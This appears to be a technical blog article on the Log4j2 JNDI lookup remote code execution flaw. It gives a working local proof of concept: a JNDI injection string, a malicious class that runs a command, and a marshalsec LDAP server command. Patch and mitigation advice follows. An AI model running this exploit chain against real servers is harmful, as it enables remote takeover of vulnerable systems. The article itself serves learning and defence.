BestHub
Sign in
Information Security 5 min read

Apache Log4j2 Remote Code Execution Vulnerability Exploitation Guide

This article introduces Apache Log4j2, explains the remote code execution vulnerability caused by unsafe JNDI lookups, provides step‑by‑step environment setup, PoC code, exploitation instructions, and outlines official patches and temporary mitigation measures for developers and security engineers.

Architecture Digest
Architecture Digest
Architecture Digest
Apache Log4j2 Remote Code Execution Vulnerability Exploitation Guide

1. Introduction: Apache Log4j2 is an open‑source Java logging framework widely used in middleware, development frameworks and web applications.

2. Vulnerability Overview: The vulnerability arises from recursive lookup functionality in certain Log4j2 features; an unauthenticated attacker can send specially crafted data to achieve arbitrary code execution on the target server.

3. Affected Versions: Apache Log4j 2.x <= 2.15.0‑rc1.

4. Environment Setup: Create a new Maven project and add Log4j2 dependencies.

org.apache.logging.log4j
log4j-core
2.14.1

5. Exploit PoC:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

6. Compile a malicious class Exploit.class:

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
javac exp.java

7. Start a local LDAP server using marshalsec:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888

8. Run the PoC Java program; it contacts the malicious LDAP server, loads the Exploit class and executes the embedded command (e.g., launching calculator).

9. Bypass notes: Certain StrLookup variations and specially crafted query strings can bypass early RC versions; the issue was fixed in RC2.

10. Fixes: Upgrade to the latest Log4j2 version (e.g., 2.15.0‑rc2 or newer) and apply the following temporary mitigations:

Add JVM option -Dlog4j2.formatMsgNoLookups=true .

Place a log4j2.component.properties file in the classpath with log4j2.formatMsgNoLookups=true .

Use JDK 11.0.1, 8u191, 7u201, 6u211 or later.

Deploy third‑party firewall products for additional protection.

JavaRemote Code ExecutionMitigationlog4j2exploitSecurity Vulnerability
Architecture Digest
Written by

Architecture Digest

Focusing on Java backend development, covering application architecture from top-tier internet companies (high availability, high performance, high stability), big data, machine learning, Java architecture, and other popular fields.

0 followers
Reader feedback

How this landed with the community

login Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment